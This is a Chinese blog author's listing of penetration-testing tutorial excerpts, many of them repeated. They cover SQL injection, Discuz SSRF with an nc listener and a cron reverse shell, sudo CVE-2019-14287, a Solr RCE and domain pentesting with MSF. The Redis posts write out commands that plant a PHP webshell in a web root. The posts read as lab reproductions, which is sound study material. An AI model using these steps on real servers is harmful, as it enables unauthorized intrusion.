内网渗透
L18296069161
这个作者很懒,什么都没留下…
展开
-
WEB渗透学习指南!
原创 2020-03-03 11:46:53 · 351 阅读 · 0 评论 -
防止SQL注入的五种方法!!!!!!!
一、SQL注入简介SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。二、SQL注入攻击的总体思路1.寻找到SQL注入的位置2.判断服务器类型和后台数据库类型3.针对不通的服务器和数据库特点进行SQL注入攻击三、SQL注入攻击实例比如在一个登录界面,要求输入用户名和密码:可以这样输...原创 2020-02-22 11:42:42 · 627 阅读 · 0 评论 -
渗透常用工具
.Burpsuite jdk链接:httpspan.baidu.coms14ht8tItbK14q5A-jH6QKWw提取码:i2yg原创 2020-02-14 11:58:30 · 539 阅读 · 0 评论 -
ssrf漏洞利用操作
#001 环境搭建:Phpstudy+win7搭建discuz漏洞环境把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可安装完成访问一波:#002 漏洞复现:Centos7,临时关闭防火墙开启nc监听6666端口:nc -lvp 6666查看centos7的ip利用discuz的漏洞向centos7发起一个请求:htt...原创 2020-02-08 11:01:35 · 697 阅读 · 0 评论 -
网络安全——linux sudo root 权限绕过漏洞复现
一.漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确...原创 2020-01-19 16:32:27 · 353 阅读 · 0 评论 -
Redis未授权如何访问漏洞?
1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了,查看一下文件的内容在浏览器中...原创 2020-01-17 10:30:17 · 109 阅读 · 0 评论 -
Redis未授权访问漏洞的利用
1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了,查看一下文件的内容在浏览器中...原创 2020-01-16 10:41:42 · 112 阅读 · 0 评论 -
Redis未授权访问漏洞的利用
1、利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了,查看一下文件的内容在...原创 2020-01-15 10:28:50 · 171 阅读 · 0 评论 -
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
一.漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294967295以root用户身份运行命令。具有足够sudo权限的用户可以使用它来运行Runas规范明确...原创 2020-01-14 11:23:45 · 289 阅读 · 0 评论 -
Discuz-ssrf利用计划任务反弹shell
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了...原创 2020-01-13 11:30:17 · 267 阅读 · 0 评论 -
Discuz-ssrf利用计划任务反弹shell
#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看权限是有的经过各种尝试无果,开始了...原创 2020-01-10 12:00:35 · 332 阅读 · 0 评论 -
Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作
一.漏洞描述2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置可以包含脚本,因此该参数存在安全隐患。...原创 2020-01-07 17:04:21 · 682 阅读 · 0 评论 -
Discuz-3.1 ssrf漏洞利用操作
773617250渗透学习交流群,群内定期发布课程直播内容、时间及地址,欢迎大家进群学习!感谢大家的支持!#001 环境搭建: Phpstudy+win7搭建discuz漏洞环境 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可 安装完成访问一波:#002 漏洞复现: Centos7,临时关闭防火墙 开启nc监听6666端口:n...原创 2019-12-31 10:19:36 · 931 阅读 · 0 评论 -
Redis未授权访问漏洞的利用
利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一个redis.php的文件 可以看到生成了,查看一下文件的内容...原创 2019-12-30 10:51:05 · 97 阅读 · 0 评论 -
linux sudo root 权限绕过漏洞(CVE-2019-14287)复现
WEB渗透学习交流群:773617250群内定期通知直播课程、时间及地址,欢迎大家进群学习交流!一. 漏洞描述2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复。此漏洞编号是CVE-2019-14287,当sudo配置为允许用户以任意方式运行命令时用户通过Runas规范中的ALL关键字,可以通过指定用户ID -1或4294...原创 2019-12-28 10:44:59 · 245 阅读 · 0 评论 -
Discuz-ssrf利用计划任务反弹shell
渗透学习交流群773617250,群内定期通知课程内容、课程时间及直播地址,欢迎大家进群学习交流!001 环境搭建: Centos7(安装有apache,php,mysql,redis) 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/upload进行安装,但是...原创 2019-12-27 13:31:45 · 233 阅读 · 0 评论 -
利用redis写webshell
在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到生成了,查看一下文件的内容在浏览器中访问一下这个文件,成功解析,内容改成一...原创 2019-12-26 10:58:30 · 1506 阅读 · 0 评论 -
Redis未授权访问漏洞的利用
渗透学习交流群:群内定期通知课程直播时间及地址,欢迎大家进群学习交流! 利用redis写webshell 在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save 然后看一下目录下是否生成了一...原创 2019-12-26 10:49:04 · 174 阅读 · 1 评论 -
第十八章——内网渗透之域渗透
渗透学习交流群:773617250进群可免费领取学习工具,群内定期通知直播时间!欢迎大家进群学习交流!感谢大家的支持!MSF在讲域渗透之前,先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点:针对对方是x64的架构 生成一个x64的...原创 2019-12-24 10:32:25 · 338 阅读 · 0 评论 -
Discuz-ssrf利用计划任务反弹shell
渗透学习交流群:773617250进群免费领取学习教程,群内定期通知直播时间,直播时间可与老师互动,欢迎大家进群学习!#001 环境搭建: Centos7(安装有apache,php,mysql,redis) 利用winscp把discuz的源码拖到var/www/html目录下: chmod -R 777 upload/ 改一下权限 然后访问192.168.136.133/up...原创 2019-12-23 11:08:17 · 163 阅读 · 0 评论 -
第十八章——内网渗透之域渗透
773617250渗透学习交流群,进群可领取一套完整学习工具,群内定期通知参加直播课程,直播时间可与老师进行互动。感谢大家的支持!MSF在讲域渗透之前,先给大家讲讲MSF●kali代理配置http://pawelli.com/archives/527●回顾msf知识●针对内网 批量扫描 ms17-010●针对域成员 08R2 msf渗透 并提权要点:针对对方是x64的架构 生成...原创 2019-12-21 12:04:58 · 489 阅读 · 0 评论